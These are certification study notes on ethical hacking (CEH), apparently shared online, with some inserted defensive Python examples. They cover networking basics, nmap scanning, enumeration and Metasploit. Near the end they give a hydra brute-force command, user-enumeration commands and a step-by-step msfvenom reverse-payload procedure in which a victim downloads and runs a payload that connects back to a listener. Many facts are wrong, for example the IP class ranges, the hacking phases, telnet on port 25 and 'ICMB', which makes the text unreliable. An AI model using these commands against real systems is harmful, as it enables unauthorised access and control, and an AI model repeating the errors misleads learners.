CEH Notes

The document provides an overview of ethical hacking, networking, IP addressing, and various protocols, emphasizing the importance of identifying and fixing vulnerabilities in systems. It details the OSI model, types of network devices, and the phases of ethical hacking, along with terminology and security policies. Additionally, it covers risk management, incident management, and security standards relevant to information security.

Uploaded by bookpdf092

CEH Certification

Ethical Hacking, sometimes called Penetration Testing, is the act of intruding into or penetrating systems or networks to find the threats and vulnerabilities in those systems that a malicious attacker could find and exploit, causing loss of data, financial loss or other major damage. The purpose of ethical hacking is to improve the security of the network or systems by fixing the vulnerabilities found during testing. Ethical hackers may use the same methods and tools as malicious hackers, but with the permission of the authorised person and for the purpose of improving security and defending the systems from attacks by malicious users. Ethical hackers are expected to report all the vulnerabilities and weaknesses found during the process to management.

Networking
Networking is used to communicate between two or more different networks.
There are several network topologies:

1) Star Topology : It is used for broadcasting. Hubs are used in star topology.
2) Mesh Topology : In mesh topology all nodes are connected to each other, and it
costs more.
3) Hybrid Topology : It is a combination of two or more topologies, and it costs more.
4) Ring Topology : It allows more devices to be attached to a single central hub, but it
increases the distance the signal travels to reach the devices.
( It uses a token system. )
5) Tree Topology : It is arranged as parent and child nodes. It uses hubs for long distances and it costs
more.
6) Bus Topology : All nodes are connected to a single line. If one node fails then
the whole network fails.

Difference between Data & Information :

Data is in raw format; when we process the data, the outcome is called
information.

IP Address
IP Address :
An IP address is a 32-bit sequence of 1s and 0s ( binary ). An IP address is a way to identify
a machine on a network. It is a unique identifier.

IP Uses :
It is used to connect to other computers. It allows transfer of files and e-mail.
Internet Protocol is used for communicating data between networks over the network.

There are five classes of IP address :

Class A : Reserved for government and large companies. It supports 16M hosts on each of
127 networks.
( 1.0.0.1 - 126.255.255.254 ) ( 126.255.255 is subnet & 254 is host )
1.0.0.1 = 1 is network & 0.0.1 is host.

Class B : Reserved for large and medium companies. It supports 65,000 hosts on each of 16,000
networks.
( 128.0.0.0 - 191.255.255.255 )
128.0.0.0 = 128.0 is network & 0.0 is host.

Class C : Reserved for medium or small companies or small networks. It supports 254 hosts.
( 192.0.0.0 - 233.255.255.255 )
192.0.0.0 = 192.0.0 is network & 0 is host.

Class D : Reserved for multicasting.
( 244.0.0.0 - 239.255.255.255 )

Class E : Reserved for future and experimental use.
( 240.0.0.0 - 254.255.255.255 )

There are two types of IP address, public & private ( e.g. 192.168.0.1 ).

There are two versions of IP address :

1) IPv4 : It consists of 32 bits ( e.g. 192.168.0.1 ). 4B addresses can connect to IPv4.
2) IPv6 : It consists of 128 bits. It is written in hexadecimal. ( e.g. fe80::a299:9bff:fe18:50d1 )

Types of IP : Static & Dynamic

Static : It is entered manually by the network administrator. Manageable for small
networks, but requires careful checking to avoid duplication.

Dynamic : Assigned by a server, derived automatically from a range of addresses.

127.0.0.1 is the loopback address, the local host, which is used to establish an IP
connection to the same machine or computer being used by the end user.
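The classful split and the public/private/loopback distinctions above can be checked in code. The following is an example added by the editor, not part of the original notes. It uses the standard first-octet class boundaries from RFC 791 (A: 0-127, B: 128-191, C: 192-223, D: 224-239, E: 240-255) where the note's figures differ, and the `ipaddress` module from the Python standard library for the private and loopback tests.

```python
import ipaddress

# Standard classful first-octet ranges (RFC 791) and the classful prefix
# length used to split network and host bits. D and E have no host part.
CLASS_TABLE = [
    ("A", 0, 127, 8),
    ("B", 128, 191, 16),
    ("C", 192, 223, 24),
    ("D", 224, 239, None),
    ("E", 240, 255, None),
]


def classify_ipv4(text):
    """Describe an IPv4 address: class, classful network/host split,
    whether it is loopback (127.0.0.0/8) and whether it is private."""
    addr = ipaddress.IPv4Address(text)
    first_octet = int(addr) >> 24
    info = {
        "address": str(addr),
        "binary": format(int(addr), "032b"),   # the 32-bit sequence of 1s and 0s
        "class": None,
        "network": None,
        "host": None,
        "loopback": addr.is_loopback,
        "private": addr.is_private,            # RFC 1918 ranges such as 192.168.0.0/16
    }
    for name, low, high, prefix in CLASS_TABLE:
        if low <= first_octet <= high:
            info["class"] = name
            if prefix is not None:
                net = ipaddress.IPv4Network((addr, prefix), strict=False)
                info["network"] = str(net.network_address)
                # host part = address bits that fall outside the classful mask
                host_bits = int(addr) & ~int(net.netmask) & 0xFFFFFFFF
                info["host"] = str(ipaddress.IPv4Address(host_bits))
            break
    return info


if __name__ == "__main__":
    for sample in ("1.0.0.1", "128.0.0.0", "192.168.0.1", "224.0.0.5", "127.0.0.1"):
        print(classify_ipv4(sample))
```

The network/host split is what the notes show by hand for 1.0.0.1 (network 1, host 0.0.1); here it falls out of masking with the classful prefix length, and the same function tells you whether an address would be routable on the public Internet or is private or loopback.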

MAC Address
• Stands for "Media Access Control Address," and no, it is not related to Apple Macintosh
computers. A MAC address is a hardware identification number that uniquely identifies each
device on a network. The MAC address is manufactured into every network card, such as an
Ethernet card or Wi-Fi card, and therefore cannot be changed.
• Because there are millions of networkable devices in existence, and each device needs to
have a unique MAC address, there must be a very wide range of possible addresses. For this
reason, MAC addresses are made up of six two-digit hexadecimal numbers, separated by colons.
For example, an Ethernet card may have a MAC address of 00:0d:83:b1:c0:8e. Fortunately,
you do not need to know this address, since it is automatically recognized by most networks.
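As an added example (the editor's, not from the notes), the parser below splits a MAC address into its six bytes and reads the two bits of the first byte that matter when reviewing a device inventory: the individual/group bit (0x01, set on multicast and broadcast addresses) and the universally/locally administered bit (0x02, set when the address was assigned by software rather than burned in by the manufacturer). The first three bytes are the vendor prefix (OUI). The sample address is the one from the notes; the others are constructed.

```python
def parse_mac(text):
    """Accept 00:0d:83:b1:c0:8e, 00-0d-83-b1-c0-8e or 000d.83b1.c08e and
    return the six raw bytes. Anything that is not 48 bits of hex is rejected."""
    hexdigits = text.replace(":", "").replace("-", "").replace(".", "").lower()
    if len(hexdigits) != 12 or any(c not in "0123456789abcdef" for c in hexdigits):
        raise ValueError("not a 48-bit MAC address: %r" % text)
    return bytes.fromhex(hexdigits)


def describe_mac(text):
    """Canonical form plus the facts a reviewer reads off the first byte."""
    mac = parse_mac(text)
    first = mac[0]
    return {
        "canonical": ":".join("%02x" % b for b in mac),
        "oui": ":".join("%02x" % b for b in mac[:3]),     # manufacturer prefix
        "multicast": bool(first & 0x01),                   # I/G bit
        "locally_administered": bool(first & 0x02),        # U/L bit
        "broadcast": mac == b"\xff" * 6,
    }


if __name__ == "__main__":
    for sample in ("00:0d:83:b1:c0:8e", "02-00-5E-10-00-01", "01:00:5e:00:00:01"):
        print(describe_mac(sample))
```

A locally administered address is legitimate on virtual interfaces and on clients that randomise their MAC, so on its own it is only a hint; but a "burned-in" address whose U/L bit is set, or an OUI that does not match the device's claimed vendor, is worth a second look in an asset inventory.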

TCP & UDP Protocol
There are two logical protocols: TCP & UDP.
TCP : Transmission Control Protocol.
TCP is a connection-oriented protocol. It provides an extensive error-checking mechanism.
TCP is comparatively slower than UDP. TCP is reliable, as it guarantees delivery of data to the
destination.

UDP : User Datagram Protocol.

UDP is a datagram-oriented protocol. UDP has only a basic error-checking
mechanism. UDP is faster, simpler & more efficient than TCP. The delivery of data to the
destination cannot be guaranteed with UDP.

There are 65,535 TCP & UDP ports. Ports are used for connecting to servers such as HTTP and FTP.

Types Of Ports & Numbers
Various types of ports & their numbers.

01) HTTP : 80 ( Hypertext Transfer Protocol ).
02) FTP : 20 , 21 ( File Transfer Protocol ).
03) Telnet : 23
04) SSH : 22 ( Secure Shell ).
05) NTP : 123 ( Network Time Protocol ).
06) SMTP : 25 ( Simple Mail Transfer Protocol ).
07) SNMP : 161 , 162 ( Simple Network Management Protocol ). Internal port.
08) POP3 : 110 ( Post Office Protocol 3 ).
09) IMAP : 143 ( Internet Message Access Protocol ).
10) DNS : 53 ( Domain Name System ).
11) DHCP : 67 , 68 ( Dynamic Host Configuration Protocol ).
12) NetBIOS : 137 , 139
13) MSRPC : 135 ( Microsoft Remote Procedure Call ).
14) SMB : 445 ( Server Message Block ( Windows ) ). Used for printers and other sharing.
15) LDAP : 389 ( Lightweight Directory Access Protocol ).
16) MySQL : 3306
17) HTTPS : 443 ( S : Secure Socket Layer. )
18) SNPP : 444 ( Simple Network Paging Protocol ).

OSI Model
OSI Model : The Open Systems Interconnection model.
It was created by the International Organization for Standardization ( ISO ). The OSI model provides a standard
for computer systems to be able to communicate with each other. OSI is a reference model.

There are seven layers in the OSI model, and each layer has its own responsibility.

Application layer ( 7th layer ) : Human-computer interaction layer, where applications can
access the network services.

Presentation layer ( 6th layer ) : Ensures that data is in a usable format; this is where
encryption occurs.

Session layer ( 5th layer ) : Maintains connections & is responsible for controlling ports and
sessions.

Transport layer ( 4th layer ) : Transmits data using transmission protocols, including TCP &
UDP.

Network layer ( 3rd layer ) : The network layer assigns IP addresses & decides which path the
data will take.

Data link layer ( 2nd layer ) : Defines the format of the data on the network; error
detection and error correction happen in this layer.

Physical layer ( 1st layer ) : Transmits the raw bit stream over the physical medium.

TCP / IP Model : ( 4 layers )

1) Application layer - ( Application, Presentation & Session layers )

2) Transport layer

3) Internet layer

4) Network layer - ( Data link & Physical layers )

Network Devices
1) HUB : It is used to broadcast data.

2) Switch : It is used to send data to a specific destination.

3) Router : It is a device like a switch that routes data packets based on their IP address.

4) DHCP : Dynamic Host Configuration Protocol.

DORA ( Discover , Offer , Request , Acknowledgement ) ( C-D , D-C , C-D , D-C )

5) DNS : Domain Name System. ( DNS Query , DNS Return ) ( C-D , D-C )

6) IDS : Intrusion Detection System. It detects attacks on the network & alerts the system.

7) IPS : Intrusion Prevention System. It detects the attack and prevents the attack.

8) Firewall : A firewall is a device or software which prevents unauthorised attacks and unauthorised
access. It has its own rules according to our requirements, known as an access control list ( ACL ).

File Permission
Three Type Of Permission :
1) Read = r - 4
2) Write = w - 2
3) Execute = x - 1
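The r=4, w=2, x=1 weights above are what turn a symbolic mode such as `rwxr-x---` into the octal `750` and back. The conversion in both directions, plus the check a reviewer applies first (is the file writable by everyone?), as an example added by the editor rather than code from the notes:

```python
SYMBOL_VALUE = {"r": 4, "w": 2, "x": 1}


def symbolic_to_octal(sym):
    """'rwxr-x---' -> '750'. Expects the 9-character owner/group/other form."""
    if len(sym) != 9:
        raise ValueError("expected 9 characters such as rwxr-xr-x")
    digits = []
    for start in range(0, 9, 3):           # owner, group, other
        value = 0
        for ch, expected in zip(sym[start:start + 3], "rwx"):
            if ch == expected:
                value += SYMBOL_VALUE[ch]  # r=4, w=2, x=1
            elif ch != "-":
                raise ValueError("bad permission character %r" % ch)
        digits.append(str(value))
    return "".join(digits)


def octal_to_symbolic(octal):
    """'644' -> 'rw-r--r--'."""
    mode = int(octal, 8)
    out = []
    for shift in (6, 3, 0):                # owner bits, group bits, other bits
        bits = (mode >> shift) & 0o7
        out.append("r" if bits & 4 else "-")
        out.append("w" if bits & 2 else "-")
        out.append("x" if bits & 1 else "-")
    return "".join(out)


def is_world_writable(octal):
    """True when the 'other' triple includes write (the 2 bit of the last digit)."""
    return bool(int(octal, 8) & 0o002)


if __name__ == "__main__":
    for sym in ("rwxr-x---", "rw-r--r--", "rwxrwxrwx"):
        octal = symbolic_to_octal(sym)
        print(sym, octal, "world-writable" if is_world_writable(octal) else "")
```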

IMP Info.Sec
There are 5 phases of ethical hacking.

1) Information Gathering / Reconnaissance : To gather information about a system or a
network.

2) Scanning : To check the vulnerability of a system or a network and check all the ports of
a network or system.

3) Gaining Access : To enter the system using the gathered information and the scanning, through an
open port or another vulnerability.

4) Maintaining : To exit from the system.

5) Covering Tracks : Removing logs from the system to avoid overflow in the system.

Terminology
Terminology Of Ethical Hacking :

1) Vulnerability : A weakness of the system or the network.

2) Exploit : Taking advantage of the vulnerability and exploiting the system or the network.

3) Payload : The payload is the part of an exploit code that performs the malicious action, such as
destroying data, creating a backdoor & hijacking the computer.

4) Zero Day Attack : An attack that exploits a computer application using a vulnerability before
the software developer releases a patch for the vulnerability.

5) Doxing : Publishing personally identifiable information about an individual, collected
from publicly available databases & social media.

6) Bot : A bot is a software application that can be controlled remotely to execute or automate
pre-defined tasks.

7) Daisy Chaining : It involves gaining access to one network / computer and using the
same information to gain access to multiple networks or computers.

8) Hack Value : It is the notion among hackers that something is worth doing or
interesting.

Element
Elements Of Information Security. ( CIA )

1) Confidentiality : Assures that the information is accessible only to those who have
authorised access.

2) Integrity : The trustworthiness of data or resources in terms of preventing improper and
unauthorised change.

3) Availability : Resources or data should be available to the user when the user wants to access the
data.

4) Authenticity : Refers to the characteristic of a communication or document that ensures
the quality of being genuine.

5) Non-Repudiation : Guarantees that the sender of a message cannot later deny having
sent the message & the recipient cannot deny having received the message.

Attack Vector
Top Information Security Attack Vectors.

1) Cloud computing threats.

2) Advanced persistent threat : Stealing information from the victim machine without
the victim or user being aware of it.

3) Viruses & Worms :

Virus : A virus is a self-replicating software program that is capable of infecting a network
or a system within seconds after being launched.
Worms : Malware that arrives through the Internet, the LAN or the network.

4) Malware / Ransomware : Encrypts the information in files so that a human can't read it.

5) Mobile threats.

6) Botnet : A botnet is a network of compromised systems used by an attacker to perform
various malicious attacks.

7) Insider Attack : It is an attack performed on a corporate network by an untrusted person
( insider ) who has authorised access to the network.

Type Of Hacker & Policy
Types Of Hacker :
1) Black Hat.
2) White Hat.
3) Gray Hat.
4) Suicide Hacker.
5) Script Kiddie.
6) Cyber Terrorist.
7) State-Sponsored Hacker.
8) Hacktivist.

Types Of Policy :

1) Promiscuous Policy : No restriction on system resources.

2) Permissive Policy : The permissive policy restricts only widely known dangerous attacks or
behaviour.

3) Prudent Policy : The prudent policy ensures the maximum & strongest security among
them; however, it allows known, necessary risks, blocking services but enabling them individually.

4) Paranoid Policy : Denies everything, limiting Internet usage.

Risk & Incident
Risk & Risk Management :

1) Risk Identification : To identify risks in the system or network.

2) Risk Assessment : To measure the impact of the risk or data loss.

3) Risk Treatment : To resolve the risk.

4) Risk Tracking : To follow how the risk develops.

5) Risk Review : To write a report on the risk.

Incident & Incident Management : ( Live attack. )

1) Incident Identification : To identify the type of attack.

2) Incident Assessment : To measure the impact of the incident and any data affected.

3) Incident Treatment : To resolve or defend against the attack.

4) Incident Tracking : To find out how the incident happened.

5) Incident Review : To write a report on the incident that happened.

VAPT And Security
VA & PT : To find the vulnerability ( loophole ) and test it.

1) Black Box : No information is given for the test.

2) White Box : Information is given for testing.

3) Grey Box : Partial information is given for testing.

Phases Of VAPT :

1) Pre-Attack : To find vulnerabilities.

2) Attack : To exploit using the vulnerability.

3) Post-Attack : To make a report on the attack performed.

Security :

Security Audit : To check all security controls for updates and confirm they are up to date.

Security Standards :

1) PCI-DSS : Payment Card Industry Data Security Standard.

2) HIPAA : Health Insurance Portability & Accountability Act.

3) SOX : Sarbanes-Oxley Act : To protect shareholders & the general public from
accounting errors & fraud. ( To improve corporate governance & accountability. )

4) ISO : International Organization for Standardization.

5) ITIL : Information Technology Infrastructure Library.

6) PCI SSC : Payment Card Industry Security Standards Council.

Module 2
1) Footprinting & Reconnaissance.

Footprinting & Reconnaissance
Footprinting & Reconnaissance :

1) Shodan.io

2) Netcraft.com

3) Osintframework.com

4) web.archive.org

5) virustotal.com

6) haveibeenpwned.com

Terminal commands :

1) whois ( site name )

2) whatweb -v ( site name )

3) sublist3r -d ( site name )

4) dnsenum ( site name )

5) dirb https:// or http:// ( site name ) ( If CODE:200 , it opens directly )

Module 3

Three-Way Handshake [ (C) Syn - (S) Syn+Ack - (C) Ack ]

1) Syn = Synchronize : Initiates a connection between hosts.

2) Ack = Acknowledgement : Acknowledges receipt of a packet.

3) Psh = Push : Send all buffered data immediately.

4) Rst = Reset : Resets the connection.

5) Fin = Finish : There will be no more transmissions.

6) Urg = Urgent : The data contained in the packet is to be processed immediately.

Nmap

All the IP addresses are examples. ( Client to server - Server to client )

1) nmap 192.168.0.1/24 - Scan the whole subnet.

2) nmap -p- 192.168.0.1 - Scan all ports of the IP.

3) nmap -sV 192.168.0.1 - Show the service version on each port.

4) nmap -p21 192.168.0.1 - Scan a specific port.

5) nmap -p80-139 192.168.0.1 - Scan multiple ports.

6) nmap -sT 192.168.0.1 - TCP scan / full open scan / connect scan.

7) nmap -sS 192.168.0.1 - Stealth scan / half-open scan. [ (C) Syn - (S) Syn+Ack - (C) Rst ] = Port is open.

[ (C) Syn - (S) Rst ] = Port is closed.

8) nmap -sX 192.168.0.1 - Xmas scan [ (C) Syn+Urg+Psh - (S) No response ] = Port is open.
[ (C) Syn+Urg+Psh - (S) Rst ] = Port is closed.

9) nmap -O 192.168.0.1 - To scan for the operating system.

10) nmap -A 192.168.0.1 - Aggressive scan.

11) nmap -sI 192.168.0.1 - Zombie scan.

12) nmap -sU 192.168.0.1 - UDP scan [ No response = port is open , Rst flag =
port is closed ]

13) nmap -v 192.168.0.1 - Scan in verbose mode.

14) nmap -Pn 192.168.0.1 - For ping.

15) nmap -T4 192.168.0.1 - Timing template ( 0 - 5 ).

16) nmap -sA 192.168.0.1 - Acknowledgement scan [ Firewall ]

17) nmap -F 192.168.0.1 - Fast scan.

18) nmap -f 192.168.0.1 - Fragment packets. [ Filtered = firewall is present ]

Counter Measures :

• Configure firewall & IDS rules to detect & block pings.
• Run a port-scanning tool against hosts on the network to determine whether the firewall
properly detects the port-scanning activity.
• Ensure that router, IDS & firewall firmware are up to date with the latest release.
• Use a custom ruleset to lock down the network & block unwanted ports at the firewall.
• Ensure that anti-scanning & anti-spoofing rules are configured.
• Perform TCP & UDP scanning along with ICMB probes against your organization's IP addresses to
check the network configuration & its available ports.

ICMB = In Charactor Message Board
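The flag definitions in Module 3 and the scan patterns above are enough to write the detection side of the last countermeasure: reading TCP flags out of captured traffic and picking out hosts that probe many ports with the same pattern. The block below is the editor's example, not code from the notes; the records it runs over are constructed flow entries (source, destination, destination port, raw TCP flag byte), and the Xmas pattern is matched as the FIN+PSH+URG combination that nmap's -sX actually sends.

```python
from collections import defaultdict

# TCP flag bits as laid out in the flags byte of the TCP header
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def decode_flags(flag_byte):
    """0x12 -> {'SYN', 'ACK'}"""
    return {name for name, bit in FLAG_BITS.items() if flag_byte & bit}


def classify_probe(flags):
    """Label one client->server segment by the scan pattern it matches."""
    if flags == {"SYN"}:
        return "syn"        # first step of a connect or half-open scan
    if flags == {"FIN", "PSH", "URG"}:
        return "xmas"       # nmap -sX
    if flags == {"ACK"}:
        return "ack"        # nmap -sA firewall probe
    if not flags:
        return "null"       # nmap -sN
    return "other"          # normal traffic, replies, data segments


def detect_scanners(records, port_threshold=10):
    """records: iterable of (src, dst, dport, flag_byte), client->server only.
    Returns {src: {pattern: distinct_ports}} for sources that hit at least
    port_threshold distinct (dst, port) pairs with one probe pattern."""
    seen = defaultdict(lambda: defaultdict(set))
    for src, dst, dport, flag_byte in records:
        kind = classify_probe(decode_flags(flag_byte))
        if kind != "other":
            seen[src][kind].add((dst, dport))
    report = {}
    for src, patterns in seen.items():
        hits = {k: len(v) for k, v in patterns.items() if len(v) >= port_threshold}
        if hits:
            report[src] = hits
    return report


# Constructed sample: 10.0.0.5 sweeps 20 ports with bare SYNs, 10.0.0.7 sends
# Xmas probes (FIN+PSH+URG = 0x29) to 12 ports, and 10.0.0.9 does one normal
# handshake to port 443 (SYN, then ACK).
SAMPLE_FLOWS = (
    [("10.0.0.5", "10.0.0.10", p, 0x02) for p in range(20, 40)]
    + [("10.0.0.7", "10.0.0.10", p, 0x29) for p in range(100, 112)]
    + [("10.0.0.9", "10.0.0.10", 443, 0x02), ("10.0.0.9", "10.0.0.10", 443, 0x10)]
)

if __name__ == "__main__":
    print(detect_scanners(SAMPLE_FLOWS))
```

A single SYN to one port is what every legitimate connection starts with, so the signal is the spread across distinct ports from one source, not the flag pattern alone; the threshold is the knob to tune against your own baseline. Only the client-to-server direction is fed in, so the server's SYN+ACK and RST replies do not count as probes.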

Banner Grabbing

Banner Grabbing :
Banner grabbing, or OS fingerprinting, is the method of determining the operating system
running on a remote target system.

Active Banner Grabbing :

Specially crafted packets are sent to the remote OS & the responses are noted.
The responses are compared with a database to determine the OS.
Responses from different operating systems vary due to differences in TCP/IP stack implementation.

Passive Banner Grabbing :

Banner grabbing from error messages provides information such as the type of server, type of
OS & SSL tool used by the target remote system.

Sniffing The Network Traffic :

Capturing & analysing packets from the target enables an attacker to determine the OS used
by the remote system.

Banner Grabbing From Page Extension :

Looking for the extension in the URL may assist in determining the application version.

e.g. ( .aspx ) IIS server & Windows platform.

telnet 192.168.0.1 80 ( Press Enter ) [ 80 is the port number ]

GET / HTTP/1.1 ( Press Enter 2 times ) [ To see server & OS ]

[ To connect to the telnet port, the telnet port needs to be open. ]

telnet 192.168.0.1 25 [ 25 is the telnet port ]

e.g. nc -vv www.cybervaultsec.com [ nc = netcat ( used for listening ) , -vv for verbose
mode ]

Counter Measures :

Display a full banner to misguide the attacker.

Turn off unnecessary services on the network host to limit information disclosure.
Use a server-mask tool to change or hide the banner information.
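The countermeasures above are easiest to verify against your own servers. The block below is an added example by the editor, not part of the notes: it parses a raw HTTP response (the kind the `GET / HTTP/1.1` exchange above returns) and lists the headers that disclose software or version, and applies the page-extension hint from the notes to a URL. The response bytes are constructed; the only extension mapping taken from the notes is `.aspx`, the rest are assumptions added for illustration.

```python
def parse_http_response(raw):
    """Split a raw HTTP/1.x response into (status_line, {header_name: value}).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


# Headers commonly used to announce the server software or framework version
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version")


def banner_findings(raw):
    """Return {header: value} for every disclosing header present in the response."""
    _, headers = parse_http_response(raw)
    return {h: headers[h] for h in DISCLOSING_HEADERS if h in headers}


# Extension -> platform hint. '.aspx' is the example given in the notes; the
# other entries are the editor's assumptions for illustration.
EXTENSION_HINTS = {".aspx": "IIS / Windows", ".php": "PHP", ".jsp": "Java servlet container"}


def extension_hint(url):
    path = url.split("?", 1)[0].split("#", 1)[0]
    for ext, hint in EXTENSION_HINTS.items():
        if path.lower().endswith(ext):
            return hint
    return None


# Constructed response as a server that leaks both its web server and framework versions
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.41 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/7.4.3\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html></html>"
)

if __name__ == "__main__":
    print(banner_findings(SAMPLE_RESPONSE))
    print(extension_hint("https://example.test/login.aspx?ReturnUrl=/"))
```

Running this over responses captured from your own hosts gives a quick list of what a passive banner grab would learn; the fix for each finding is the server's own configuration (suppressing or genericising the `Server` and `X-Powered-By` headers), which is the "server-mask" countermeasure the notes mention.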

.

27/47
Proxy, Anonymizer & Spoofing

Proxy Server :
• A proxy server is an application that can serve as an intermediary for connecting with other
systems.
• To hide the source IP address: to mask the actual source of the attack with the source
address of the proxy.
• To remotely access intranet & other website resources that are normally off limits.
• To intercept all the requests sent by a user & transmit them to a third destination, so the
victim will only be able to identify the proxy server address.

Proxy Chaining :
• The user requests a resource from the destination.
• The proxy client hides the user's system, connects to the proxy server, & passes the request through the
proxy server.
• The proxy server strips the user's identifying information & passes the request to the next
proxy server.
• The process is repeated by every proxy server in the chain.
• At the end, the unencrypted request reaches the destination server.

Anonymizer :
• An anonymizer removes all identifying information from the user's computer while the user surfs
the Internet.
• An anonymizer makes activity on the Internet untraceable.
• An anonymizer also allows you to bypass Internet censorship.

Why Use An Anonymizer :

• Privacy & anonymity, and protection from online attacks.
• Access restricted content.
• Bypass IDS & firewall rules.

IP Spoofing Counter Measures :

• Encrypt all network traffic using cryptographic network protocols such as IPsec, TLS, SSH,
HTTPS.
• Use multiple firewalls providing multi-layer desktop protection.
• DO NOT rely on IP-based authentication.
• Use random initial sequence numbers to prevent IP spoofing attacks based on sequence
number spoofing.

Ingress Filtering :
Use routers & firewalls at your network perimeter to filter incoming packets that appear to
come from an internal IP address.

Egress Filtering :
Filter all outgoing packets with an invalid local IP address as the source address.
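The two filtering rules above are symmetric: ingress drops arriving packets that claim an address you own, egress drops departing packets that claim an address you do not own. An example implementation added by the editor (not from the notes), with 192.168.0.0/16 assumed as the organisation's own prefix and a constructed batch of packets to run through both rules:

```python
import ipaddress

# Assumed: the address space this perimeter is responsible for
INTERNAL_PREFIXES = [ipaddress.ip_network("192.168.0.0/16")]


def is_internal(src):
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in INTERNAL_PREFIXES)


def ingress_decision(src):
    """Packet arriving from outside: it must not claim an internal (or loopback) source."""
    addr = ipaddress.ip_address(src)
    if is_internal(src) or addr.is_loopback:
        return "drop: spoofed internal source"
    return "accept"


def egress_decision(src):
    """Packet leaving the network: its source must be one of our own addresses,
    otherwise a host inside is spoofing someone else's address."""
    if not is_internal(src):
        return "drop: invalid local source"
    return "accept"


def filter_packets(packets):
    """packets: (direction, src, dst) with direction 'in' or 'out'.
    Returns the same tuples with the decision appended."""
    results = []
    for direction, src, dst in packets:
        decide = ingress_decision if direction == "in" else egress_decision
        results.append((direction, src, dst, decide(src)))
    return results


# Constructed traffic: two legitimate flows and two spoofed ones
SAMPLE_PACKETS = [
    ("in", "203.0.113.4", "192.168.1.10"),    # normal inbound
    ("in", "192.168.1.5", "192.168.1.10"),    # outside packet claiming to be inside
    ("out", "192.168.2.3", "198.51.100.7"),   # normal outbound
    ("out", "10.9.9.9", "198.51.100.7"),      # inside host spoofing a foreign source
]

if __name__ == "__main__":
    for row in filter_packets(SAMPLE_PACKETS):
        print(row)
```

Egress filtering protects other people's networks from spoofed traffic originating in yours (the pattern behind reflection attacks), which is why it is often the rule that is forgotten; ingress filtering protects your own hosts from packets that pretend to be colleagues.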

.

30/47
Module 4 ( Enumeration )

Enumeration :
In the enumeration phase, an attacker initiates active connections with the target system.
Once the attacker discovers an attack point, they can gain unauthorised access using this collected
information to reach assets.

:~# cd /usr/share/nmap/scripts/

e.g. nmap -p139 --script nbstat.nse 192.168.0.1 [ NetBIOS port no : 139 ]

e.g. smtp-user-enum -U ( .txt file ) -M VRFY -t 192.168.0.1 [ ( M = mode ) ,
( VRFY = verify ) , ( t = target ) ] [ smtp = mail server ]

enum4linux -a 192.168.0.1

Password Cracking :
hydra -P test.txt 192.168.0.1 snmp [ P = password list ]

After the password is shown :

snmp-check -p161 -c Public 192.168.0.1

Module 5 ( Vulnerability )

Vulnerability Analysis :
• Vulnerability assessment is an examination of the ability of a system or application, including
its current security procedures & controls, to withstand assault.
• It recognises, measures & classifies security vulnerabilities in the computer system, network &
communication channels.

Types Of Assessment : [ CVE & NVD = vulnerability lookup sites. ]

1) Active Assessment : Uses a network scanner to find hosts, services and vulnerabilities.

2) Passive Assessment : ( Sniffing ) : A technique that sniffs the network traffic to find out
the active systems, network services, applications & vulnerabilities present.

3) External Assessment : Assesses the network from a hacker's point of view to find out what
exploits & vulnerabilities are accessible to the outside world.

4) Internal Assessment : A technique to scan the internal infrastructure to find exploits
& vulnerabilities.

5) Host-Based Assessment : Determines the vulnerabilities in a specific workstation or server
by performing configuration-level checks from the command line.

6) Network Assessment : Determines the possible network security attacks that may
occur on the organization's systems.

7) Application Assessment : Tests the web infrastructure for any misconfiguration &
known vulnerabilities.

8) Wireless Network Assessment : Determines the vulnerabilities in the organization's wireless
network.

9) Web Assessment : Static & Dynamic [ ( Static - no input ) & ( Dynamic - input ) ]

Vulnerability Management Life Cycle :

1) Creating a baseline.

2) Vulnerability Assessment : Physical security, firewall and others.

3) Risk Assessment : To measure the risk level.

4) Remediation : Tell them to take action and apply patches and other fixes.

5) Verification : To verify whether all the attacks have been addressed or not.

6) Monitoring : To check the IDS and implement policy.

( Nikto for vulnerability scanning )

Module 6 ( System Hacking )

System Hacking Methodology :

1) Cracking Passwords : Gaining access.

2) Escalating Privileges :
- Vertical privilege escalation : Gaining higher-level access.
- Horizontal privilege escalation : Gaining another account's access ( same level ).

3) Executing Applications : Maintaining access.

4) Hiding Files : To hide backdoors and other files.

5) Covering Tracks : Delete logs.

Password Attack

Password Attacks :

1) Non-Electronic or Non-Technical Attack : Shoulder surfing, eavesdropping, dumpster diving.

2) Active Online Attack : Dictionary attack, brute-force attack, hash injection.

3) Passive Online Attack : Wire sniffing, packet sniffing, MitM attack, Bittercup.

4) Default Passwords : user, admin, root, etc.

5) Offline Attack : ( Rainbow table ) : MD2, MD4, MD5, SHA1, SHA256, SHA384,
SHA512 & other hashing formats.

6) USB Attack.

7) LAN Manager : Symmetric key algorithm, ( ticket used ).

8) NTLM : New Technology LAN Manager : Uses different encryption for username &
password.

9) Kerberos Authentication : Symmetric key algorithm ( Protocol No 88 )

To Start Metasploit :

# service postgresql start ( for the first time )

# msfdb init ( for the first time )
# msfconsole

1. search ( --/-- ) [ ( --/-- ) = a specific port, protocol, service version or
other term ]
2. use ( --/-- )
3. show options

Payloads

How To Create A Payload :

1. msfvenom -l payloads - To list and select a payload.

2. msfvenom -p ( selected payload ) lhost= ( our IP ) lport= ( above 1024 ) -f ( payload
format, .exe etc. ) -o ( payload file name )

3. python -m SimpleHTTPServer - To start a Python web server.

4. msfconsole

5. use exploit/multi/handler

6. set payload ( selected payload name )

7. set lhost

8. set lport

- Go to the victim's browser and type in the URL our IP address : SimpleHTTPServer port number.
- Download the payload on the victim machine, and execute the payload on the victim machine.

9. Enter exploit or run in msfconsole ( the msf framework ) after the payload is installed on the victim
machine.

Executing Application

Executing Applications :

After gaining unauthorised access to the system, an attacker may perform or execute the following
activities.

• Installation of malware : To collect information and set up a backdoor to maintain access.
• Install a cracker to crack passwords & scripts.
• Install a keylogger to gather information from input devices such as the keyboard.
